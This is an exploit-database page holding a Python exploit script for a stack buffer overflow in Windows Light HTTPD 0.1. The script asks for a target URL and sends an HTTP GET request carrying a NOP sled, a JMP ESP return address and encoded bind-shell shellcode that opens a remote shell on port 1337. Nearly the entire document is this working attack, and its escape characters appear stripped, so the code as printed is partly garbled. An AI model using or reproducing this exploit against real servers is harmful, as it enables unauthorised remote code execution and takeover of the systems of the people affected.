[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Windows Light HTTPD 0.1 - Buffer Overflow
# Published : 2013-04-25
# Author :
# Previous Title : SAP ConfigServlet Remote Unauthenticated Payload Execution
# Next Title : GroundWork monarch_scan.cgi OS Command Injection
import urllib2
from time import sleep
#########################################################################################################################################
# Title************************Windows Light HTTPD v0.1 HTTP GET Buffer Overflow
# Discovered and Reported******24th of April, 2013
# Discovered/Exploited By******Jacob Holcomb/Gimppy042
# Software Vendor**************http://sourceforge.net/projects/lhttpd/?source=navbar
# Exploit/Advisory*************http://infosec42.blogspot.com/
# Software*********************Light HTTPD v0.1
# Tested Platform**************Windows XP Professional SP2
# Date*************************24/04/2013
#
#PS - This is a good piece of software to practice Stack Based Buffer Overflows if you curiouz and want to learnz
#########################################################################################################################################
# Exploit-DB Note: Offset 255 for Windows XP SP3
# jmp esp ntdll 0x7c31fcd8
# payload = "x90" * 255 + "xd8xfcx91x7c" + "x90" * 32 + shellcode
def targURL():
while True:
URL = raw_input("n[*] Please enter the URL of the Light HTTP server you would like to PWN. Ex. http://192.168.1.1nn>")
if len(URL) != 0 and URL[0:7] == "http://":
break
else:
print "nn[!!!] Target URL cant be null and must contain http:// or https:// [!!!]n"
sleep(1)
return str(URL)
def main():
target = targURL()
# msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=1337 R | msfencode -c 1 -e x86/shikata_ga_nai -b "x00x0ax0dxffx20" R
shellcode = "xb8x3bxafxc1x8axdbxcdxd9x74x24xf4x5ax29xc9"
shellcode += "xb1x56x83xc2x04x31x42x0fx03x42x34x4dx34x76"
shellcode += "xa2x18xb7x87x32x7bx31x62x03xa9x25xe6x31x7d"
shellcode += "x2dxaaxb9xf6x63x5fx4ax7axacx50xfbx31x8ax5f"
shellcode += "xfcxf7x12x33x3ex99xeex4ex12x79xcex80x67x78"
shellcode += "x17xfcx87x28xc0x8ax35xddx65xcex85xdcxa9x44"
shellcode += "xb5xa6xccx9bx41x1dxcexcbxf9x2ax98xf3x72x74"
shellcode += "x39x05x57x66x05x4cxdcx5dxfdx4fx34xacxfex61"
shellcode += "x78x63xc1x4dx75x7dx05x69x65x08x7dx89x18x0b"
shellcode += "x46xf3xc6x9ex5bx53x8dx39xb8x65x42xdfx4bx69"
shellcode += "x2fxabx14x6exaex78x2fx8ax3bx7fxe0x1ax7fxa4"
shellcode += "x24x46x24xc5x7dx22x8bxfax9ex8ax74x5fxd4x39"
shellcode += "x61xd9xb7x55x46xd4x47xa6xc0x6fx3bx94x4fxc4"
shellcode += "xd3x94x18xc2x24xdax33xb2xbbx25xbbxc3x92xe1"
shellcode += "xefx93x8cxc0x8fx7fx4dxecx5ax2fx1dx42x34x90"
shellcode += "xcdx22xe4x78x04xadxdbx99x27x67x6ax9exe9x53"
shellcode += "x3fx49x08x64xbaxb0x85x82xaexd2xc3x1dx46x11"
shellcode += "x30x96xf1x6ax12x8axaaxfcx2axc4x6cx02xabxc2"
shellcode += "xdfxafx03x85xabxa3x97xb4xacxe9xbfxbfx95x7a"
shellcode += "x35xaex54x1ax4axfbx0exbfxd9x60xcexb6xc1x3e"
shellcode += "x99x9fx34x37x4fx32x6exe1x6dxcfxf6xcax35x14"
shellcode += "xcbxd5xb4xd9x77xf2xa6x27x77xbex92xf7x2ex68"
shellcode += "x4cxbex98xdax26x68x76xb5xaexedxb4x06xa8xf1"
shellcode += "x90xf0x54x43x4dx45x6bx6cx19x41x14x90xb9xae"
shellcode += "xcfx10xd9x4cxc5x6cx72xc9x8cxccx1fxeax7bx12"
shellcode += "x26x69x89xebxddx71xf8xeex9ax35x11x83xb3xd3"
shellcode += "x15x30xb3xf1"
#7C941EED FFE4 JMP ESP ntdll.dll
payload = "x90" * 258 + "xEDx1Ex94x7C" + "x90" * 32 + shellcode
port = ":3000/"
sploit = target + port + payload
try:
print "n[*] Preparing to send Evil PAYLoAd to %s!n[*] Payload Length: %dn[*] Waiting..." % (target[7:], len(sploit))
httpRequest = urllib2.Request(sploit)
sploit = urllib2.urlopen(httpRequest, None, 6)
except(urllib2.URLError):
print "n[!!!] Error. Please check that the Light HTTP Server is online [!!!]n"
except:
print "n[!!!] The server did not respond, but the payload was sent. F!ng3r$ Cr0$$3d 4 c0d3 Ex3cut!0n! [!!!]n"
if __name__ == "__main__":
main()